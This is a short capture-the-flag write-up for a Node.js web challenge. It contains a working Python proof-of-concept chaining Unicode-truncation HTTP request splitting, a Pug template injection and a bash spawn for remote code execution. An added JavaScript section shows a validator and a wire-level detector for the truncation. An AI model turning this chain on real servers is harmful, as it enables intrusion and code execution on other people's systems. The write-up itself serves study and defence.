```python
import urllib.parse

# The command to run is not given on the page; placeholder only.
cmd = 'PLACEHOLDER_COMMAND'

# Stage 1: JavaScript that spawns bash via the spawn_sync binding, then
# rewritten as octal escapes so it survives the template interpolation.
payload = "process.binding('spawn_sync').spawn({file:'bash',args:['/bin/bash','-c','%s'],envPairs:['y='],stdio:[{type:'pipe',readable:1}]})" % (cmd)
payload = ''.join('\\' + oct(ord(c))[2:] for c in payload)

# Stage 2: a second, smuggled request whose `pug` header carries the
# template injection ("filter" / "constructor" written as octal escapes).
payload = ''' HTTP/1.1
Host: x
Connection: keep-alive

GET /flag HTTP/1.1
Host: x
adminauth: secretpassword
pug: #{[]["\146\151\154\164\145\162"]["\143\157\156\163\164\162\165\143\164\157\162"]("%s")()}
x:''' % (payload)

# Stage 3: shift every character into the U+FF00..U+FFFF range; the vulnerable
# Node.js HTTP module keeps only the low byte, restoring the raw CR/LF.
payload = ''.join(chr(int('0xff' + hex(ord(c))[2:].zfill(2), 16)) for c in payload)
print('http://web2.ctf.nullcon.net:8081/core?q=' + urllib.parse.quote(payload))
```
Because the server has been shut down, only the PoC is attached, briefly. The main idea of this challenge is a Unicode handling bug in the HTTP module of the Node.js/V8 version used, combined with a Pug template injection that leads to remote code execution.
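The following is an added example and not part of the original write-up. It reproduces, on the defending side, the low-byte truncation the PoC relies on: when a string containing characters above U+00FF is encoded as latin1 by Node.js, only the low byte of each character survives, so U+FF0D / U+FF0A become raw CR / LF on the wire. It then shows a validator that rejects such values before they are placed into a request line or header. All function names (`shiftToFfRange`, `latin1Bytes`, `isSafeHeaderValue`) and the sample input are constructed for this example.

```javascript
// Added example: latin1 truncation check for attacker-controlled header/path values.

// Mirror of the encoding trick used in the PoC, here only to build a
// constructed test input: shift every character into the U+FFxx range.
function shiftToFfRange(s) {
  return Array.from(s, c => String.fromCharCode(0xff00 + c.charCodeAt(0))).join('');
}

// What a latin1-encoding HTTP client writes to the socket. Node documents
// that latin1 encoding keeps only the first 8 bits of each character.
function latin1Bytes(s) {
  return Buffer.from(s, 'latin1');
}

// Defender-side validator: true only when the value cannot produce a CR or
// LF once encoded. Characters above U+00FF are rejected outright because
// their high byte would be silently dropped, and literal CR/LF are rejected too.
function isSafeHeaderValue(value) {
  for (const ch of value) {
    const cp = ch.codePointAt(0);
    if (cp > 0xff) return false;                 // would be truncated to cp & 0xff
    if (cp === 0x0d || cp === 0x0a) return false; // literal line terminator
  }
  return true;
}

// Detection on the wire side: does the encoded value contain a line break?
function containsLineBreak(buf) {
  return buf.includes(0x0d) || buf.includes(0x0a);
}

// Constructed input resembling the smuggled request from the write-up.
const crafted = shiftToFfRange('GET /flag HTTP/1.1\r\nHost: x');
const onWire = latin1Bytes(crafted);

console.log('looks harmless as a JS string:', JSON.stringify(crafted));
console.log('after latin1 truncation:', JSON.stringify(onWire.toString('latin1')));
console.log('validator accepts it:', isSafeHeaderValue(crafted));
console.log('wire bytes contain CR/LF:', containsLineBreak(onWire));
```

Current Node.js releases already throw on characters outside the allowed range in `http.request` paths and header values; the validator above is for code that assembles raw requests itself, or that still runs on a Node version with the truncation behaviour, and the `containsLineBreak` check is the condition a proxy or WAF would log as a request-splitting attempt.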